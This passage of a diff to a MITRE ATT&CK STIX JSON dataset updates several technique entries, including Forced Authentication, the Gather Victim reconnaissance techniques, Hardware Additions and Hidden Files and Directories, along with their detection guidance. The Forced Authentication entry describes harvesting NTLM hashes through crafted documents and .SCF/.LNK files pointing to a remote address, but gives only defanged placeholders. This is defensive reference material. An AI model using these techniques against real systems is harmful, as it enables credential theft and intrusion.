"https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/", + "description": "Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel source code and proprietary data dumped online. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Firmware", + "description": "Before compromising a victim, adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "id": "attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T03:52:36.854Z", + "created": "2020-10-02T16:46:42.537Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "id": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.", @@ -11487,10 +13514,18 @@ ] }, { - "id": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Forced Authentication", - "description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)\n\nThere are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\\\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)", + "created": "2018-01-16T16:13:52.465Z", + "modified": "2020-06-19T17:16:41.470Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "type": "attack-pattern", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -11533,37 +13568,29 @@ "source_name": "US-CERT APT Energy Oct 2017" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)\n\nThere are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\\\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)", + "name": "Forced Authentication", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "x_mitre_version": "1.2", + "x_mitre_contributors": [ + "Teodor Cimpoesu", + "Sudhanshu Chauhan, @Sudhanshu_C" ], - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "credential-access" - } - ], - "modified": "2020-06-19T17:16:41.470Z", - "created": "2018-01-16T16:13:52.465Z", - "x_mitre_is_subtechnique": false, - "x_mitre_platforms": [ - "Windows" - ], - "x_mitre_permissions_required": [ - "User" - ], - "x_mitre_detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)", "x_mitre_data_sources": [ "File monitoring", "Network protocol analysis", "Network device logs", "Process use of network" ], - "x_mitre_contributors": [ - "Teodor Cimpoesu", - "Sudhanshu Chauhan, @Sudhanshu_C" + "x_mitre_detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)", + "x_mitre_permissions_required": [ + "User" ], - "x_mitre_version": "1.2" + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_is_subtechnique": false }, { "external_references": [ @@ -11603,7 +13630,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "GUI Input Capture", - "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015). ", + "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015). ", "id": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "type": "attack-pattern", "kill_chain_phases": [ @@ -11736,6 +13763,200 @@ "x_mitre_is_subtechnique": true, "x_mitre_version": "1.0" }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1592", + "url": "https://attack.mitre.org/techniques/T1592" + }, + { + "source_name": "ATT ScanBox", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Gather Victim Host Information", + "description": "Before compromising a victim, adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "id": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T03:53:39.351Z", + "created": "2020-10-02T16:39:33.966Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1589", + "url": "https://attack.mitre.org/techniques/T1589" + }, + { + "source_name": "OPM Leak", + "url": "https://www.opm.gov/cybersecurity/cybersecurity-incidents/", + "description": "Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved October 20, 2020." + }, + { + "source_name": "Register Deloitte", + "url": "https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/", + "description": "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020." + }, + { + "source_name": "Register Uber", + "url": "https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/", + "description": "McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020." + }, + { + "source_name": "Detectify Slack Tokens", + "url": "https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/", + "description": "Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020." + }, + { + "source_name": "Forbes GitHub Creds", + "url": "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196", + "description": "Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020." + }, + { + "source_name": "GitHub truffleHog", + "url": "https://github.com/dxa4481/truffleHog", + "description": "Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020." + }, + { + "source_name": "GitHub Gitrob", + "url": "https://github.com/michenriksen/gitrob", + "description": "Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020." + }, + { + "source_name": "CNET Leaks", + "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/", + "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "Before compromising a victim, adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "name": "Gather Victim Identity Information", + "id": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-27T02:27:31.387Z", + "created": "2020-10-02T14:54:59.263Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1590", + "url": "https://attack.mitre.org/techniques/T1590" + }, + { + "source_name": "WHOIS", + "url": "https://www.whois.net/", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020." + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + }, + { + "source_name": "Circl Passive DNS", + "url": "https://www.circl.lu/services/passive-dns/", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Gather Victim Network Information", + "description": "Before compromising a victim, adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "id": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-25T22:58:23.086Z", + "created": "2020-10-02T15:45:17.628Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1591", + "url": "https://attack.mitre.org/techniques/T1591" + }, + { + "source_name": "ThreatPost Broadvoice Leak", + "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/", + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020." + }, + { + "source_name": "DOB Business Lookup", + "url": "https://www.dobsearch.com/business-lookup/", + "description": "Concert Technologies . (n.d.). Business Lookup - Company Name Search. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Gather Victim Org Information", + "description": "Before compromising a victim, adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "id": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:10:36.479Z", + "created": "2020-10-02T16:27:02.339Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { @@ -12022,50 +14243,36 @@ "external_references": [ { "source_name": "mitre-attack", - "external_id": "T1562.003", - "url": "https://attack.mitre.org/techniques/T1562/003" + "external_id": "T1592.001", + "url": "https://attack.mitre.org/techniques/T1592/001" }, { - "external_id": "CAPEC-13", - "source_name": "capec", - "url": "https://capec.mitre.org/data/definitions/13.html" + "source_name": "ATT ScanBox", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020." } ], "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "HISTCONTROL", - "description": "Adversaries may configure HISTCONTROL to not log all command history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\n\nThis setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \u201c ls\u201d will not be saved, but \u201cls\u201d would be saved by history.\n\n Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.", - "id": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "name": "Hardware", + "description": "Before compromising a victim, adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).", + "id": "attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26", "type": "attack-pattern", "kill_chain_phases": [ { "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" + "phase_name": "reconnaissance" } ], - "modified": "2020-03-29T22:09:18.020Z", - "created": "2020-02-21T20:56:06.498Z", + "modified": "2020-10-24T03:53:03.353Z", + "created": "2020-10-02T16:40:47.488Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_version": "1.0", "x_mitre_is_subtechnique": true, - "x_mitre_permissions_required": [ - "User" - ], - "x_mitre_defense_bypassed": [ - "Host forensic analysis", - "Log analysis" - ], - "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL environment variable is also suspicious.", - "x_mitre_data_sources": [ - "Environment variable", - "File monitoring", - "Authentication logs", - "Process monitoring" - ], "x_mitre_platforms": [ - "Linux", - "macOS" + "PRE" ] }, { @@ -12076,8 +14283,13 @@ "external_references": [ { "source_name": "mitre-attack", - "url": "https://attack.mitre.org/techniques/T1200", - "external_id": "T1200" + "external_id": "T1200", + "url": "https://attack.mitre.org/techniques/T1200" + }, + { + "external_id": "CAPEC-440", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/440.html" }, { "url": "https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html", @@ -12115,7 +14327,7 @@ "phase_name": "initial-access" } ], - "modified": "2020-07-14T19:36:40.493Z", + "modified": "2020-09-16T16:12:48.086Z", "created": "2018-04-18T17:59:24.739Z", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ @@ -12128,7 +14340,7 @@ "Asset management", "Data loss prevention" ], - "x_mitre_version": "1.0" + "x_mitre_version": "1.1" }, { "external_references": [ @@ -12222,22 +14434,6 @@ "created": "2017-12-14T16:46:06.044Z" }, { - "created": "2020-02-26T17:46:13.128Z", - "modified": "2020-03-29T22:32:25.985Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - } - ], - "type": "attack-pattern", - "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", - "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", - "name": "Hidden Files and Directories", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "source_name": "mitre-attack", @@ -12260,24 +14456,40 @@ "source_name": "WireLurker" } ], - "x_mitre_platforms": [ - "Windows", - "macOS", - "Linux" + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", - "x_mitre_detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.", - "x_mitre_permissions_required": [ - "User" + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Hidden Files and Directories", + "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark 